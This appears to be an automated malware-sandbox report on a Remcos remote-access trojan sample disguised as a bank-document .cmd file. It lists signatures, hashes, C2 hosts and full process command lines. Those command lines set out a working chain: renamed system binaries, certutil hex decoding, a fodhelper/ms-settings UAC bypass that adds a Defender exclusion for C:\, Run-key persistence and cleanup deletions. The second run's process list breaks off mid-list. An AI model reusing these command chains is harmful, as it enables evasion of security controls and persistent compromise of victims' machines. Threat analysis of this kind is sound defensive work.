Analysis Overview
SHA256
909566cec9e7ecbe5d202f3f5a5e169093a4ab98824b7a5b85b1950d621f16d9
Threat Level: Known bad
The file 909566cec9e7ecbe5d202f3f5a5e169093a4ab98824b7a5b85b1950d621f16d9.tar.danger was found to be: Known bad.
Malicious Activity Summary
Remcos
Nirsoft
NirSoft WebBrowserPassView
NirSoft MailPassView
Executes dropped EXE
Checks computer location settings
Adds Run key to start application
Accesses Microsoft Outlook accounts
Suspicious use of SetThreadContext
Suspicious use of AdjustPrivilegeToken
Script User-Agent
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious behavior: GetForegroundWindowSpam
Modifies registry class
Kills process with taskkill
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-12 13:01
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-12 13:01
Reported
2024-05-12 13:04
Platform
win10v2004-20240508-en
Max time kernel
150s
Max time network
148s
Command Line
Signatures
Remcos
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Windows \System32\per.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\kn.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\ger.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\kn.exe | N/A |
| N/A | N/A | C:\Windows \System32\per.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\Libraries\Ping_c.pif | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\SysWOW64\SndVol.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nayjqohr = "C:\\Users\\Public\\Nayjqohr.url" | C:\Users\Public\Libraries\Ping_c.pif | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3048 set thread context of 1296 | N/A | C:\Windows\SysWOW64\SndVol.exe | C:\Windows\SysWOW64\SndVol.exe |
| PID 3048 set thread context of 1576 | N/A | C:\Windows\SysWOW64\SndVol.exe | C:\Windows\SysWOW64\SndVol.exe |
| PID 3048 set thread context of 1300 | N/A | C:\Windows\SysWOW64\SndVol.exe | C:\Windows\SysWOW64\SndVol.exe |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\ms-settings\shell\open\command | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\ms-settings | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\ms-settings\shell | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\ms-settings\shell\open | C:\Users\Public\ger.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" | C:\Users\Public\ger.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\Libraries\Ping_c.pif | N/A |
| N/A | N/A | C:\Users\Public\Libraries\Ping_c.pif | N/A |
| N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\xkn.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\BANKDocuments587DOC03027321122021387032DE564RT.cmd"
C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\BANKDocuments587DOC03027321122021387032DE564RT.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\BANKDocuments587DOC03027321122021387032DE564RT.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
C:\Users\Public\ger.exe
C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
C:\Windows \System32\per.exe
"C:\\Windows \\System32\\per.exe"
C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
C:\Users\Public\Libraries\Ping_c.pif
C:\Users\Public\Libraries\Ping_c.pif
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
C:\Windows\SysWOW64\extrac32.exe
C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Ping_c.pif C:\\Users\\Public\\Libraries\\Nayjqohr.PIF
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\System32\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\piaqt"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\aknauhwb"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\kestuzhdhmuh"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.171:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cxcs.microsoft.net | udp |
| BE | 104.68.66.114:443 | cxcs.microsoft.net | tcp |
| US | 8.8.8.8:53 | 171.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.66.68.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wealthconsultantmanager.com | udp |
| US | 108.170.55.202:443 | wealthconsultantmanager.com | tcp |
| US | 108.170.55.202:443 | wealthconsultantmanager.com | tcp |
| US | 8.8.8.8:53 | 202.55.170.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.ozkol-aluminyum.com | udp |
| MY | 103.186.117.186:2404 | www.ozkol-aluminyum.com | tcp |
| MY | 103.186.117.186:2404 | www.ozkol-aluminyum.com | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 186.117.186.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
Files
C:\Users\Public\alpha.exe
| MD5 | 8a2122e8162dbef04694b9c3e0b6cdee |
| SHA1 | f1efb0fddc156e4c61c5f78a54700e4e7984d55d |
| SHA256 | b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450 |
| SHA512 | 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397 |
C:\Users\Public\kn.exe
| MD5 | bd8d9943a9b1def98eb83e0fa48796c2 |
| SHA1 | 70e89852f023ab7cde0173eda1208dbb580f1e4f |
| SHA256 | 8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2 |
| SHA512 | 95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b |
C:\Users\Public\xkn.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
memory/3864-36-0x000002EA1A360000-0x000002EA1A382000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ivrd1je3.fs2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Public\ger.exe
| MD5 | 227f63e1d9008b36bdbcc4b397780be4 |
| SHA1 | c0db341defa8ef40c03ed769a9001d600e0f4dae |
| SHA256 | c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d |
| SHA512 | 101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9 |
C:\Users\Public\Ping_c.mp4
| MD5 | 182901dd6c35f6cc65a8c4103d8beddd |
| SHA1 | a52233a6ceb0009ef6284909f4389ed20443d39e |
| SHA256 | 9d77adc9eea50fd91430684ad42ee8e17ff8269366ecbbab65ad5d5c6ba7beb8 |
| SHA512 | 9e790b3907f11cb789a8b9f9d06925ac22b1d2b130da82a6f0e71415e362b3eb8a80627c2a58da12b6c60c56e293c5b5d6bed4b3b630bec7f8a6f4f5ca229a0e |
C:\Windows \System32\per.exe
| MD5 | 85018be1fd913656bc9ff541f017eacd |
| SHA1 | 26d7407931b713e0f0fa8b872feecdb3cf49065a |
| SHA256 | c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5 |
| SHA512 | 3e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459 |
C:\Users\Public\Libraries\Ping_c.pif
| MD5 | de5de91a0288d235eccab327f5c506df |
| SHA1 | 1c71bda09faa6a04c6c00c331531af76676511f3 |
| SHA256 | 10297db5ec0a0804324c1b2cda6a0b304cd3a2cf7cc807bf8532a7753e7f8b28 |
| SHA512 | d7448847bdbc1cdd1819debad50f329ac5e946355751ebcbd4acba370be89716f6c75159376339ca78aaadeac97803a087e8703067a5eda1e6d739a09916a068 |
memory/5092-75-0x0000000000400000-0x00000000004F9000-memory.dmp
memory/3048-83-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3048-86-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3048-81-0x0000000002E10000-0x0000000003E10000-memory.dmp
memory/3048-87-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3048-88-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3048-89-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3048-90-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3048-92-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3048-91-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3048-94-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1296-97-0x0000000000400000-0x0000000000478000-memory.dmp
memory/1576-100-0x0000000000400000-0x0000000000462000-memory.dmp
memory/1576-102-0x0000000000400000-0x0000000000462000-memory.dmp
memory/1300-103-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1300-108-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1300-107-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1296-101-0x0000000000400000-0x0000000000478000-memory.dmp
memory/1296-99-0x0000000000400000-0x0000000000478000-memory.dmp
memory/1576-98-0x0000000000400000-0x0000000000462000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\piaqt
| MD5 | 25a7e8d624c2bfdb2facdc50a1d9b965 |
| SHA1 | bbf90e7e78dcba692d6a35716d72cd1affc8cf9c |
| SHA256 | 880d0a92fcd2d68631b413e0cc98d71fc68337abb19f59901c075e058c694b47 |
| SHA512 | 35e57b1fd68fd64c325d179323c3383c39cb00e37b42480c0962517eb8ffdffd5d3a95b77122161f651e45ab2fee4a8e5c3f604bd80351a2680f087ea2b9517f |
memory/3048-111-0x000000001C6A0000-0x000000001C6B9000-memory.dmp
memory/3048-114-0x000000001C6A0000-0x000000001C6B9000-memory.dmp
memory/3048-115-0x000000001C6A0000-0x000000001C6B9000-memory.dmp
memory/3048-116-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3048-120-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3048-121-0x0000000000400000-0x0000000000482000-memory.dmp
C:\ProgramData\sw3ew\logs.dat
| MD5 | 30671b093f5a1a50bd41d5ba742c5506 |
| SHA1 | 5c6a9cec97c238e4f36971dac83cb5788b483ace |
| SHA256 | 321d8bb9e0b0f95280424517c53d1678b27447688e3ffba9791ad585cb7f0bc0 |
| SHA512 | 87f6498b4686b5130e9b5134c96e1c5d75feac81496f5505f2164408df13051d29f1b9d0a910b7d08a0e99eca360e2f110b880d70b1e5964c92141840ff48c3b |
memory/3048-128-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3048-136-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3048-137-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3048-144-0x0000000000400000-0x0000000000482000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-12 13:01
Reported
2024-05-12 13:04
Platform
win11-20240419-en
Max time kernel
150s
Max time network
149s
Command Line
Signatures
Remcos
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\kn.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\ger.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\kn.exe | N/A |
| N/A | N/A | C:\Windows \System32\per.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\Libraries\Ping_c.pif | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\SysWOW64\colorcpl.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nayjqohr = "C:\\Users\\Public\\Nayjqohr.url" | C:\Users\Public\Libraries\Ping_c.pif | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4640 set thread context of 2832 | N/A | C:\Windows\SysWOW64\colorcpl.exe | C:\Windows\SysWOW64\colorcpl.exe |
| PID 4640 set thread context of 4460 | N/A | C:\Windows\SysWOW64\colorcpl.exe | C:\Windows\SysWOW64\colorcpl.exe |
| PID 4640 set thread context of 4752 | N/A | C:\Windows\SysWOW64\colorcpl.exe | C:\Windows\SysWOW64\colorcpl.exe |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\ms-settings | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\ms-settings\shell | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\ms-settings\shell\open | C:\Users\Public\ger.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\ms-settings\shell\open\command | C:\Users\Public\ger.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\Libraries\Ping_c.pif | N/A |
| N/A | N/A | C:\Users\Public\Libraries\Ping_c.pif | N/A |
| N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\xkn.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\BANKDocuments587DOC03027321122021387032DE564RT.cmd"
C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\BANKDocuments587DOC03027321122021387032DE564RT.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\BANKDocuments587DOC03027321122021387032DE564RT.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
C:\Windows\system32\extrac32.exe
